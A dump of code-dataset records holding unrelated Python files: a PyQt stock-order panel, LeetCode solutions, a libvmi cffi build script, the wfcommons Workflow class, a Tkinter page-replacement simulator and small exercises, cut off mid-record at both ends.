self.label_ask_price_1.setText(str(round(data[13][0], price_round)))\n            self.label_ask_volume_5.setText(str(data[14][4]))\n            self.label_ask_volume_4.setText(str(data[14][3]))\n            self.label_ask_volume_3.setText(str(data[14][2]))\n            self.label_ask_volume_2.setText(str(data[14][1]))\n            self.label_ask_volume_1.setText(str(data[14][0]))\n            self.label_bid_price_1.setText(str(round(data[15][0], price_round)))\n            self.label_bid_price_2.setText(str(round(data[15][1], price_round)))\n            self.label_bid_price_3.setText(str(round(data[15][2], price_round)))\n            self.label_bid_price_4.setText(str(round(data[15][3], price_round)))\n            self.label_bid_price_5.setText(str(round(data[15][4], price_round)))\n            self.label_bid_volume_1.setText(str(data[16][0]))\n            self.label_bid_volume_2.setText(str(data[16][1]))\n            self.label_bid_volume_3.setText(str(data[16][2]))\n            self.label_bid_volume_4.setText(str(data[16][3]))\n            self.label_bid_volume_5.setText(str(data[16][4]))\n            self.label_high_limit_price.setText(str(round(data[17], price_round))) # limit-up price\n            self.label_low_limit_price.setText(str(round(data[18], price_round))) # limit-down price\n            self.label_last_price.setText(str(round(data[5], price_round))) # last price\n            if data[10] > 0.0: # previous close price\n                f_last_up_down = (data[5] / data[10]) - 1.0\n                self.label_last_up_down.setText((\"%.2f%%\" % (f_last_up_down * 100.0)))\n                if f_last_up_down > 0.0:\n                    self.label_last_up_down.setPalette(self.color_red)\n                elif f_last_up_down < 0.0:\n                    self.label_last_up_down.setPalette(self.color_green)\n                else:\n                    self.label_last_up_down.setPalette(self.color_black)\n            else:\n                self.label_last_up_down.setText(\"0.00%\")\n        except Exception as e:\n            self.log_text = \"%s:函数 OnUpdateQuote 异常!%s\" % (self.strategy, e)\n            self.logger.SendMessage(\"E\", 4, self.log_cate, self.log_text, \"M\")\n\n    def OnButtonPlaceOrder(self):\n        if self.trader != None:\n            if self.trader.IsTraderReady() == False:\n                self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未开启!\", \"M\")\n            else:\n                if self.line_edit_symbol.text() == \"\":\n                    QMessageBox.warning(self, \"提示\", \"证券代码为空!\", QMessageBox.Ok)\n                    return\n                str_symbol = self.line_edit_symbol.text() #str(unicode(self.line_edit_symbol.text(), \"gb2312\"))\n                str_exchange = \"\"\n                if self.combo_exchange.currentText() == define.DEF_EXCHANGE_STOCK_SH:\n                    str_exchange = \"SH\"\n                elif self.combo_exchange.currentText() == define.DEF_EXCHANGE_STOCK_SZ:\n                    str_exchange = \"SZ\"\n                f_price = self.spin_price.value()\n                n_amount = self.spin_volume.value()\n                n_entr_type = 0\n                if self.combo_entr_type.currentText() == define.DEF_PRICE_TYPE_STOCK_LIMIT:\n                    n_entr_type = 1\n                elif self.combo_entr_type.currentText() == define.DEF_PRICE_TYPE_STOCK_MARKET:\n                    n_entr_type = 2\n                n_exch_side = 0\n                if self.radio_button_buy.isChecked():\n                    n_exch_side = 1\n                elif self.radio_button_sell.isChecked():\n                    n_exch_side = 2\n                order = self.trader.Order(symbol = str_symbol, exchange = str_exchange, price = f_price, amount = n_amount, entr_type = n_entr_type, exch_side = n_exch_side)\n                task_place = self.trader.PlaceOrder(order, self.strategy)\n                QMessageBox.information(self, \"提示\", \"委托下单提交完成。\", QMessageBox.Ok)\n        else:\n            self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未获取!\", \"M\")\n\n    def OnButtonCancelOrder(self):\n        if self.trader != None:\n            if self.trader.IsTraderReady() == False:\n                self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未开启!\", \"M\")\n            else:\n                if self.line_edit_order_id.text() == \"\":\n                    QMessageBox.warning(self, \"提示\", \"撤单委托编号为空!\", QMessageBox.Ok)\n                    return\n                order = self.trader.Order()\n                
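# The cancel request only needs the original order id: it is read from the line edit, parsed to int below, and handed to CancelOrder(), which appears to queue the withdrawal as an asynchronous task.\n                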
int(self.line_edit_order_id.text()) # int\n                task_cancel = self.trader.CancelOrder(order, self.strategy)\n                QMessageBox.information(self, \"提示\", \"委托撤单提交完成。\", QMessageBox.Ok)\n        else:\n            self.logger.SendMessage(\"E\", 4, self.log_cate, \"交易服务尚未获取!\", \"M\")\n\n####################################################################################################\n\nif __name__ == \"__main__\":\n    import sys\n    app = QApplication(sys.argv)\n    panel = Panel(\"Strategy_Trader_STK_APE\")\n    panel.show()\n    sys.exit(app.exec_())\n","repo_name":"2bds/quantx","sub_path":"src/main/face/panel_trader_stk_ape.py","file_name":"panel_trader_stk_ape.py","file_ext":"py","file_size_in_byte":30485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73725454954","text":"class Solution:\n    def twoSum(self, numbers: List[int], target: int) -> List[int]:\n        # resultMap={}\n        # for index,i in enumerate(numbers):\n        #     if i in resultMap.keys():\n        #         return [resultMap[i],index+1]\n        #     else:\n        #         resultMap[target-i]=index+1\n        left,right=0,len(numbers)-1\n        while left<right:\n            newSum=numbers[left]+numbers[right]\n            if newSum==target:\n                return [left+1,right+1]\n            elif newSum>target:\n                right-=1\n            elif newSum<target:\n                left+=1\n"} +{"text":"from cffi import FFI\nimport os\nimport pkgconfig\n\nCDEF_HEADERS = [\n    'libvmi_cdef.h',\n]\n\nVMI_SOURCES = [\n    '#include <libvmi/libvmi.h>',\n    '#include <libvmi/slat.h>',\n    '#define LIBVMI_EXTRA_GLIB',\n    '#include <libvmi/libvmi_extra.h>',\n    '#include <glib.h>'\n]\n\n\ndef get_cflags(package):\n    includes = pkgconfig.cflags(package)\n    if not includes:\n        raise RuntimeError('Unable to find pkgconfig cflags'\n                           ' for {}'.format(package))\n    includes = includes.replace('-I', '').split(' ')\n    return includes\n\n\ndef get_libs(package):\n    libs = pkgconfig.libs(package)\n    if not libs:\n        raise RuntimeError('Unable to find pkgconfig libs'\n                           ' for {}'.format(package))\n    libs = libs.replace('-l', '').split(' ')\n    return libs\n\n\ndef check_header(header):\n    inc_path_list = [\n        '/usr/include',\n        '/usr/local/include'\n    ]\n    for inc_path in inc_path_list:\n        if os.path.exists(inc_path + '/' + header):\n            return True\n    return False\n\n\n# glib cflags and libs\nglib_includes = get_cflags('glib-2.0')\nglib_libs = get_libs('glib-2.0')\n\n# get libvmi libs\nlibvmi_libs = get_libs('libvmi')\n\nincludes = []\nincludes.extend(glib_includes)\n\nlibs = []\nlibs.extend(libvmi_libs)\nlibs.extend(glib_libs)\n\nffi = FFI()\n\n# checking for events.h\nif check_header('libvmi/events.h'):\n    VMI_SOURCES.append('#include <libvmi/events.h>')\n    CDEF_HEADERS.append('events_cdef.h')\n\nc_header_source = '\\n'.join(VMI_SOURCES)\n\n# set source\nffi.set_source(\"_libvmi\", c_header_source,\n               libraries=libs, include_dirs=includes)\n\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n# we read our C definitions from an external file\n# easier to maintain + C syntax highlighting\ncdef_content = \"\"\nfor cdef_path in CDEF_HEADERS:\n    with open(os.path.join(script_dir, cdef_path)) as cdef_file:\n        cdef_content += cdef_file.read()\n        # add newline for next file\n        cdef_content += '\\n'\nffi.cdef(cdef_content)\n\n\nif __name__ == \"__main__\":\n    ffi.compile(verbose=True)\n","repo_name":"libvmi/python","sub_path":"libvmi/libvmi_build.py","file_name":"libvmi_build.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"9266696832","text":"# baekjoon 1978 : find primes\n# solved by JY\n# DATE : 2022.02.09\n# Sieve of Eratosthenes\n# implementation\n\nfrom sys import stdin\ninput = stdin.readline\n\nn = int(input())\nans = 0\n\ndef check(num):\n    i = 2\n    while i*i <= num:\n        if num % i == 0: return False\n        i += 1\n    return True\n\nfor num in list(map(int, input().split())):\n    if num != 1 and check(num):\n        ans += 
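# --- editor's sketch (not part of the dataset records above/below) ---
# The twoSum record above walks two pointers inward over a sorted list:
# shrink from the right when the sum is too large, from the left when it is
# too small. A standalone copy of that loop, with a couple of checks:
def two_sum_sorted(numbers, target):
    left, right = 0, len(numbers) - 1
    while left < right:
        s = numbers[left] + numbers[right]
        if s == target:
            return [left + 1, right + 1]  # the problem wants 1-based indices
        elif s > target:
            right -= 1
        else:
            left += 1
    return []

assert two_sum_sorted([2, 7, 11, 15], 9) == [1, 2]
assert two_sum_sorted([2, 3, 4], 6) == [1, 3]
# --- end of sketch ---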
1\n\nprint(ans)","repo_name":"Jiyooung/ALGORITHM","sub_path":"baekjoon/2022년/2022-02/JY_B1978_re.py","file_name":"JY_B1978_re.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29576269455","text":"import getpass\nimport json\nimport networkx as nx\nimport pathlib\n\nfrom datetime import datetime\nfrom typing import Optional, List\nfrom ..common.task import Task\nfrom ..version import __version__\n\nfrom ..wfchef.utils import create_graph\nimport tempfile\n\n\nclass Workflow(nx.DiGraph):\n \"\"\"\n Representation of a workflow. The workflow representation is an extension of the\n `NetworkX DiGraph class `_.\n\n :param name: Workflow name.\n :type name: str\n :param description: Workflow instance description.\n :type description: Optional[str]\n :param wms_name: WMS name.\n :type wms_name: Optional[str]\n :param wms_version: WMS version.\n :type wms_version: Optional[str]\n :param wms_url: URL for the WMS website.\n :type wms_url: Optional[str]\n :param executed_at: Workflow start timestamp in the ISO 8601 format.\n :type executed_at: Optional[str]\n :param makespan: Workflow makespan in seconds.\n :type makespan: Optional[int]\n \"\"\"\n\n def __init__(self,\n name: Optional[str] = \"workflow\",\n description: Optional[str] = None,\n wms_name: Optional[str] = None,\n wms_version: Optional[str] = None,\n wms_url: Optional[str] = None,\n executed_at: Optional[str] = None,\n makespan: Optional[int] = 0.0\n ) -> None:\n \"\"\"Create an object of a workflow representation.\"\"\"\n self.description: Optional[\n str] = description if description else \"Instance generated with WfCommons - https://wfcommons.org\"\n self.created_at: str = str(datetime.now().astimezone().isoformat())\n self.schema_version: str = \"1.4\"\n self.wms_name: Optional[str] = \"WfCommons\" if not wms_name else wms_name\n self.wms_version: Optional[str] = str(__version__) if not wms_version else wms_version\n self.wms_url: Optional[str] = f\"https://docs.wfcommons.org/en/v{__version__}/\" if not wms_url else wms_url\n self.executed_at: Optional[str] = datetime.now().astimezone().isoformat() if not executed_at else executed_at\n self.makespan: Optional[int] = makespan\n self.tasks = {}\n self.tasks_parents = {}\n self.tasks_children = {}\n super().__init__(name=name, makespan=self.makespan, executedat=self.executed_at)\n\n def add_task(self, task: Task) -> None:\n \"\"\"\n Add a Task to the workflow.\n\n :param task: A Task object.\n :type task: Task\n \"\"\"\n self.tasks[task.name] = task\n self.tasks_parents.setdefault(task.name, set())\n self.tasks_children.setdefault(task.name, set())\n self.add_node(task.name, task=task)\n\n def add_dependency(self, parent: str, child: str) -> None:\n \"\"\"\n Add a dependency between tasks.\n\n :param parent: Parent task name.\n :type parent: str\n :param child: Child task name.\n :type child: str\n \"\"\"\n self.tasks_parents[child].add(parent)\n self.tasks_children[parent].add(child)\n self.add_edge(parent, child, weight=0)\n\n def write_json(self, json_file_path: Optional[pathlib.Path] = None) -> None:\n \"\"\"\n Write a JSON file of the workflow instance.\n\n :param json_file_path: JSON output file name.\n :type json_file_path: Optional[pathlib.Path]\n \"\"\"\n workflow_machines = []\n machines_list = []\n workflow_tasks = []\n\n workflow_json = {\n \"name\": self.name,\n \"description\": self.description,\n \"createdAt\": self.created_at,\n \"schemaVersion\": 
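# --- editor's sketch (not part of the dataset records above/below) ---
# The baekjoon 1978 record above mentions the Sieve of Eratosthenes in its
# comments but actually tests each number by trial division. When many
# numbers must be tested, a precomputed sieve answers each query in O(1):
def sieve(limit):
    is_prime = [True] * (limit + 1)
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(limit ** 0.5) + 1):
        if is_prime[p]:
            for multiple in range(p * p, limit + 1, p):
                is_prime[multiple] = False
    return is_prime

flags = sieve(1000)
assert sum(flags[:10]) == 4  # primes below 10: 2, 3, 5, 7
# --- end of sketch ---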
self.schema_version,\n \"author\": {\n \"name\": str(getpass.getuser()),\n \"email\": \"support@wfcommons.org\"\n },\n \"wms\": {\n \"name\": self.wms_name,\n \"version\": self.wms_version,\n \"url\": self.wms_url\n },\n \"workflow\": {\n \"executedAt\": self.executed_at,\n \"makespanInSeconds\": self.makespan,\n \"tasks\": workflow_tasks\n }\n }\n\n # generate tasks parents and children\n tasks_dependencies = {}\n for edge in self.edges:\n for task_name in edge:\n if task_name not in tasks_dependencies:\n tasks_dependencies[task_name] = {\"parents\": [], \"children\": []}\n tasks_dependencies[edge[0]][\"children\"].append(edge[1])\n tasks_dependencies[edge[1]][\"parents\"].append(edge[0])\n\n # add tasks to the workflow json object\n for node in self.nodes:\n task: Task = self.nodes[node][\"task\"]\n task_obj = task.as_dict()\n\n # manage task dependencies\n if task.name in tasks_dependencies:\n task_obj[\"parents\"] = tasks_dependencies[task.name][\"parents\"]\n task_obj[\"children\"] = tasks_dependencies[task.name][\"children\"]\n\n workflow_tasks.append(task_obj)\n\n # add machines to the workflow json object\n if task.machine and task.machine.name not in machines_list:\n machines_list.append(task.machine.name)\n workflow_machines.append(task.machine.as_dict())\n\n if workflow_machines:\n workflow_json[\"workflow\"][\"machines\"] = workflow_machines\n\n # write to file\n if not json_file_path:\n json_file_path = pathlib.Path(f\"{self.name.lower()}.json\")\n with open(json_file_path, \"w\") as outfile:\n outfile.write(json.dumps(workflow_json, indent=4))\n \n self.workflow_json = workflow_json\n\n def write_dot(self, dot_file_path: Optional[pathlib.Path] = None) -> None:\n \"\"\"\n Write a dot file of the workflow instance.\n\n :param dot_file_path: DOT output file name.\n :type dot_file_path: Optional[pathlib.Path]\n \"\"\"\n if not dot_file_path:\n dot_file_path = pathlib.Path(f\"{self.name.lower()}.dot\")\n nx.nx_agraph.write_dot(self, dot_file_path)\n\n def to_nx_digraph(self) -> nx.DiGraph:\n with tempfile.NamedTemporaryFile() as temp:\n self.write_json(pathlib.Path(temp.name))\n return create_graph(pathlib.Path(temp.name))\n\n def roots(self) -> List[Task]:\n return [n for n,d in self.in_degree() if d==0]\n\n def leaves(self) -> List[Task]:\n return [n for n,d in self.out_degree() if d==0]\n","repo_name":"wfcommons/wfcommons","sub_path":"wfcommons/common/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"3348508622","text":"class Solution:\n def buildArray(self, target: List[int], n: int) -> List[str]:\n res = []\n build_arr = []\n for i in range(n):\n if build_arr == target:\n break\n if i+1 in target:\n res.append(\"Push\")\n build_arr.append(i+1)\n else:\n res.append(\"Push\")\n res.append(\"Pop\")\n\n return res\n","repo_name":"sasankyadavalli/leetcode","sub_path":"buildArray_1441.py","file_name":"buildArray_1441.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27005363739","text":"from tkinter import *\nfrom tkinter.ttk import Combobox\nfrom queue import Queue\nfrom tkinter import messagebox as mbox\nimport xlwt \nfrom xlwt import Workbook \nfrom paging_algo import lru,opr,fifo\nimport csv\nimport os\n\nex_qu=[]\nex_size=[]\nex_page_faults=[]\nex_ans=[]\nex_str=[]\nex_algo=[]\nex_que_size=[]\n\ndef on_closing():\n if 
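# --- editor's sketch (not part of the dataset records above/below) ---
# Minimal use of the Workflow class from the wfcommons record above: create a
# workflow, register two tasks, declare an edge, and serialize. Task objects
# come from wfcommons' common.task module and need more constructor arguments
# than shown; `make_task` below is a hypothetical stand-in for however tasks
# are actually built in that codebase.
def build_two_task_workflow(Workflow, make_task):
    wf = Workflow(name="demo")
    parent, child = make_task("stage_in"), make_task("compute")
    wf.add_task(parent)
    wf.add_task(child)
    wf.add_dependency(parent.name, child.name)  # edge parent -> child
    wf.write_json()  # defaults to <workflow name>.json
    return wf
# --- end of sketch ---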
mbox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n with open('Paging.csv','a+',newline='') as file:\n writer = csv.writer(file,delimiter = ',')\n main_list = []\n for i in range(len(ex_algo)):\n list = []\n list.append(ex_algo[i])\n list.append(ex_size[i])\n list.append(ex_que_size[i])\n list.append(str(ex_qu[i]))\n list.append(ex_page_faults[i])\n list.append(ex_ans[i])\n list.append(ex_str[i])\n main_list.append(list)\n writer.writerows(main_list)\n paging.destroy()\n\n\ndef get_values():\n mem_size = \"\"\n algo_no = \"\"\n str2 = \"\"\n temp_str=\"\"\n process_string = \"\"\n final = \"\"\n mem_size = var1.get()\n algo_no = var2.get()\n process_string = var3.get()\n temp_str=process_string\n if process_string == \"\":\n mbox.showerror('Error', 'Please Enter Required Information!!')\n elif process_string.isdigit():\n if mem_size == \"\" or algo_no == \"\":\n mbox.showerror('Error', 'Please Enter Required Information!!')\n else:\n process_string = list(process_string)\n for i in range(0, len(process_string)):\n process_string[i] = int(process_string[i])\n if algo_no == \"fifo\":\n ans, str2 = fifo(process_string, len(process_string), int(mem_size))\n elif algo_no == \"lru\":\n ans, str2 = lru(process_string, len(process_string), int(mem_size))\n elif algo_no == \"opr\":\n ans, str2 = opr(process_string, len(process_string), int(mem_size))\n ex_final=str2\n temp = min(125, len(str2))\n for i in range(0, temp):\n final += str2[i]\n ans1 = len(process_string) - ans\n lbl1.configure(text=ans)\n lbl2.configure(text=ans1)\n lbl3.configure(text=final)\n if len(ex_size)!=0 and mem_size==ex_size[-1] and temp_str==ex_qu[-1] and algo_no.upper()==ex_algo[-1] :\n \tt=1\n else :\n\t ex_size.append(mem_size)\n\t ex_qu.append(temp_str)\n\t ex_que_size.append(len(temp_str))\n\t ex_algo.append(algo_no.upper())\n\t ex_page_faults.append(ans)\n\t ex_ans.append(ans1)\n\t ex_str.append(ex_final)\n\n else:\n if mem_size == \"\" or algo_no == \"\":\n mbox.showerror('Error', 'Please Enter Required Information!!')\n else:\n mbox.showinfo('Error', 'Process String Should Contain Numbers only!!')\n\n\ndef startAlgo():\n global var1\n global var2\n global var3\n global lbl1\n global lbl2\n global lbl3\n label = Label(\n paging,\n text=\"Page Replacement Algorithms\",\n font=(\"Arial Bold\", 50),\n width=100,\n bg=\"Bisque\",\n fg=\"darkred\",\n pady=30)\n label.pack()\n lb1 = Label(\n paging,\n text=\"Enter Frame Size : \",\n font=(\"Arial Bold\", 20),\n bg=\"linen\",\n fg=\"darkred\")\n lb2 = Label(paging,\n text=\"Enter Algorithm : \",\n font=(\"Arial Bold\", 20),\n bg=\"linen\",\n fg=\"darkred\")\n lb3 = Label(paging,\n text=\"Enter Process String : \",\n font=(\"Arial Bold\", 20),\n bg=\"linen\",\n fg=\"darkred\")\n lb1.place(x=50, y=150)\n lb2.place(x=50, y=200)\n lb3.place(x=50, y=360)\n\n var1 = StringVar()\n data = (\n \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\", \"19\", \"20\")\n ms = Combobox(paging, values=data, textvariable=var1, font=(\"Arial Bold\", 20), width=19, state=\"readonly\")\n ms.place(x=370, y=150)\n\n var2 = StringVar()\n var2.set(\"First In First Out\")\n fifo = Radiobutton(paging, text=\"First In First Out\", variable=var2, value=\"fifo\", bg=\"linen\", fg=\"darkred\",\n font=(\"Arial Bold\", 15))\n lru = Radiobutton(paging, text=\"Least Recently Used\", variable=var2, value=\"lru\", bg=\"linen\", fg=\"darkred\",\n font=(\"Arial Bold\", 15))\n opt = Radiobutton(paging, text=\"Optimal Page 
Replacement\", variable=var2, value=\"opr\", bg=\"linen\", fg=\"darkred\",\n font=(\"Arial Bold\", 15))\n fifo.place(x=370, y=200)\n lru.place(x=370, y=250)\n opt.place(x=370, y=300)\n\n var3 = StringVar()\n al = Entry(paging, textvariable=var3, width=20, font=(\"Arial Bold\", 20)).place(x=370, y=360)\n\n btn = Button(paging,\n text=\"Calculate\",\n font=(\"Arial Bold\", 18),\n bg=\"darkred\",\n fg=\"Bisque\",\n cursor=\"hand2\",\n command=get_values)\n btn.pack(pady=(270, 20))\n\n t1 = Label(paging,\n text=\"Page Fault : \",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n width=100,\n height=1,\n fg=\"darkred\",\n pady=7\n )\n t1.pack()\n t2 = Label(paging,\n text=\"Page Hit : \",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n width=100,\n height=1,\n fg=\"darkred\",\n pady=7\n )\n t2.pack()\n lbl1 = Label(paging,\n text=\"0\",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n fg=\"darkred\")\n lbl1.place(x=620, y=490)\n lbl2 = Label(paging,\n text=\"0\",\n font=(\"Arial Bold\", 22),\n bg=\"Bisque\",\n fg=\"darkred\")\n lbl2.place(x=620, y=540)\n lbl3 = Label(paging,\n text=\"\",\n font=(\"Arial Bold\", 15),\n bg=\"Bisque\",\n fg=\"darkred\",\n width=85,\n height=1,\n pady=10\n )\n lbl3.place(x=0, y=585)\n\n\ndef destroyHome():\n label.destroy()\n cal_instruction.destroy()\n btn_cal.destroy()\n about.destroy()\n startAlgo()\n\n\npaging = Tk()\npaging.geometry(\"1000x650\")\npaging.configure(bg=\"linen\")\npaging.resizable(0, 0)\n# paging.iconbitmap('i1.ico')\npaging.title(\"Page Replacement Algorithms\")\n\n\nif not os.path.exists(\"Paging.csv\"):\n ex_algo.append('Algorithm Used')\n ex_size.append('Frame Size')\n ex_que_size.append('String Length')\n ex_qu.append('Process String')\n ex_page_faults.append('Page Faults')\n ex_ans.append('Page Hit')\n ex_str.append('String')\nlabel = Label(\n paging,\n text=\"Page Replacement Algorithms\",\n font=(\"Arial Bold\", 50),\n width=100,\n bg=\"Bisque\",\n fg=\"darkred\",\n pady=30\n)\nlabel.pack()\n\ncal_instruction = Label(\n paging,\n text=\"Read How To Calculate Page Replacement Algorithms\\n & \\nClick Here To Calculate It.\",\n bg=\"linen\",\n font=(\"Arial Bold\", 20),\n justify=\"center\",\n pady=30\n)\ncal_instruction.pack()\nbtn_cal = Button(\n paging,\n text=\"Calculate\",\n font=(\"Arial Bold\", 35),\n command=destroyHome,\n width=10,\n height=1,\n bg=\"darkred\",\n fg=\"Bisque\",\n cursor=\"hand2\")\nbtn_cal.pack(pady=(10, 20))\n\nabout = Label(\n paging,\n text=\"Enter Paging Replacement Algorithm Which you want Calculate, \\nEnter Process String and Size of Main Memory.\\nAnd then Click on Calculate Button.\",\n width=100,\n height=50,\n font=(\"Arial Bold\", 20),\n bg=\"Bisque\",\n fg=\"darkred\",\n pady=30\n)\nabout.pack()\n\npaging.protocol(\"WM_DELETE_WINDOW\", on_closing)\npaging.mainloop()","repo_name":"YashThakkar27/Paging-Algorithm","sub_path":"Paging.py","file_name":"Paging.py","file_ext":"py","file_size_in_byte":7855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33712386554","text":"# def season(hemisferio, dia, mes):\r\n# if hemisferio == 0 and mes >= 6 and mes <= 9:\r\n# print(\"VERAO\")\r\n# elif hemisferio == 0 and dia > 20 and mes >= 9 and mes <= 12:\r\n# print(\"OUTONO\")\r\n# elif hemisferio == 0 and dia > 20 and mes >= 12 and mes <= 3:\r\n# print(\"INVERNO\")\r\n# elif hemisferio == 0 and dia > 20 and mes >= 3 and mes <= 6:\r\n# print(\"PRIMAVERA\")\r\n\r\n# elif hemisferio == 1 and dia > 20 and mes >= 12 and mes <= 3:\r\n# print(\"VERAO\")\r\n# elif 
hemisferio == 1 and dia > 20 and mes >= 3 and mes <= 6:\r\n# print(\"OUTONO\")\r\n# elif hemisferio == 1 and dia > 20 and mes >= 6 and mes <= 9:\r\n# print(\"INVERNO\")\r\n# elif hemisferio == 1 and dia > 20 and mes >= 9 and mes <= 12:\r\n# print(\"PRIMAVERA\")\r\n\r\n# #\r\n# #\r\n# #\r\n\r\n# hemisferio = int(input())\r\n# dia = int(input())\r\n# mes = int(input())\r\n\r\n# season(hemisferio, dia, mes)\r\n\r\n\r\ndef EstacaoAno(dia, mes):\r\n if mes in (1, 2):\r\n return 'VERAO'\r\n elif mes == 3:\r\n if dia < 21:\r\n return 'VERAO'\r\n else:\r\n return 'OUTONO'\r\n elif mes in (4, 5):\r\n return 'OUTONO'\r\n elif mes == 6:\r\n if dia < 21:\r\n return 'OUTONO'\r\n else:\r\n return 'INVERNO'\r\n elif mes in (7, 8):\r\n return 'INVERNO'\r\n elif mes == 9:\r\n if dia < 21:\r\n return 'INVERNO'\r\n else:\r\n return 'PRIMAVERA'\r\n elif mes in (10, 11):\r\n return 'PRIMAVERA'\r\n elif mes == 12:\r\n if dia < 21:\r\n return 'PRIMAVERA'\r\n else:\r\n return 'VERAO'","repo_name":"GuuiBeta/python_programs","sub_path":"Python The Huxley/Questionário 5/Ex5-06.py","file_name":"Ex5-06.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19386974569","text":"import sys\nfrom math import pi\nr = float(sys.argv[1])\na = 2 * r\nb = 2 * pi * r\nc = pi * (r**2)\ncadena = input(\"eliga una opción 1-4 \")\ncadena = float(cadena)\nif cadena == 1:\n print(\"El diámetro de la circunferencia es\",a)\nif cadena == 2:\n print(\"El perímetro de la cicunferencia es\",b)\nif cadena == 3:\n print(\"El área del circulo es\",c)\nif cadena == 4:\n print(\"saliendo\")\nif cadena != 1 and cadena != 2 and cadena != 3 and cadena != 4:\n print(\"Opción no válida\")\n","repo_name":"nefmen/Programas-python-ejercicios","sub_path":"Clase/ejercicio6.py","file_name":"ejercicio6.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37609163688","text":"import unittest\nfrom os.path import join\n\nimport viscojapan as vj\n\n__author__ = 'zy'\n\n\nclass Test_slip_overviewer(vj.MyTestCase):\n def setUp(self):\n self.this_script = __file__\n super().setUp()\n\n def test_plot(self):\n res_file = '/home/zy/workspace/viscojapan/tests/share/nrough_05_naslip_11.h5'\n reader = vj.inv.ResultFileReader(res_file)\n slip = reader.get_slip()\n\n plotter = vj.slip.plot.plot_slip_overview(\n slip,\n join(self.outs_dir, 'slip_history.pdf')\n )\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zy31415/viscojapan","sub_path":"tests/lib/viscojapan/slip/plot/test_plot_slip_overview.py","file_name":"test_plot_slip_overview.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"33475023555","text":"pattern_mal_cargo = {'Количество паллет (шт)': [4, 6],\n 'Габариты': {'Длинa кузова(м)': [2, 4], 'Ширина кузова(м)':[1.8,2],'Высота кузова(м)':[1.8,2.4]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_sr_cargo = {'Количество паллет (шт)': [12, 18],\n 'Габариты': {'Длинa кузова(м)': [3.5, 7.2], 'Ширина кузова(м)':[1.9, 2.45],'Высота кузова(м)':[1.9, 2.7]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_bol_cargo = {'Количество паллет (шт)': [20, 33],\n 'Габариты': {'Длинa кузова(м)': [5.8, 8], 'Ширина кузова(м)':[2.3, 2.45],'Высота 
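# --- editor's sketch (not part of the dataset records above/below) ---
# Quick checks for the southern-hemisphere season table in the EstacaoAno
# record above: the season flips on the 21st of March, June, September and
# December. These asserts assume EstacaoAno as defined in that record.
assert EstacaoAno(20, 3) == 'VERAO'
assert EstacaoAno(21, 3) == 'OUTONO'
assert EstacaoAno(21, 6) == 'INVERNO'
assert EstacaoAno(21, 9) == 'PRIMAVERA'
assert EstacaoAno(21, 12) == 'VERAO'
# --- end of sketch ---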
кузова(м)':[2.2, 2.7]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_ochbol_cargo = {'Количество паллет (шт)': [33, 50],\n 'Габариты': {'Длинa кузова(м)': [13.6, 16], 'Ширина кузова(м)':[2.4, 2.5],'Высота кузова(м)':[2.5, 3.1]},\n 'Масса(т)': [],\n 'Рабочий объем двигателя(л)': [],\n 'Максимальная скорость(км/ч)': []}\n\npattern_cargo = {'Количество мест': [2,3],\n 'Грузоподъемность': {'малый (0.5-2т)': pattern_mal_cargo,\n 'средний (2-5т)': pattern_sr_cargo,\n 'большой(5-16т)': pattern_bol_cargo,\n 'сверхтяжелый(от 16т)': pattern_ochbol_cargo}}\n\n\npattern_bus = {'Количество мест': [40, 150],\n 'Габариты': {'Длинa кузова(м)': [4.5,20], 'Ширина кузова(м)':[1.5, 2.55],'Расстояние от подвески до земли(см)':[15, 20]},\n 'Масса(т)': [10, 28],\n 'Рабочий объем двигателя(л)': [2, 4.43],\n 'Максимальная скорость(км/ч)': [60, 120]}\npattern_pas = {'Количество мест': [2, 8],\n 'Габариты': {'Длинa кузова(м)': [3.8,6.1], 'Ширина кузова(м)':[1.5, 2.55],'Расстояние от подвески до земли(см)':[15, 20]},\n 'Масса(т)': [1, 2.5],\n 'Рабочий объем двигателя(л)': [1, 15],\n 'Максимальная скорость(км/ч)': [60, 300]}\npattern_passenger = {'Тип пассажирского транспорта':{'автобус': pattern_bus,'легковой': pattern_pas}}\n\n\npattern_cargo_passenger = {'Количество мест': [5, 12],\n 'Габариты': {'Длинa кузова(м)': [2, 8], 'Ширина кузова(м)':[1.8, 2.5],'Расстояние от подвески до земли(см)':[15, 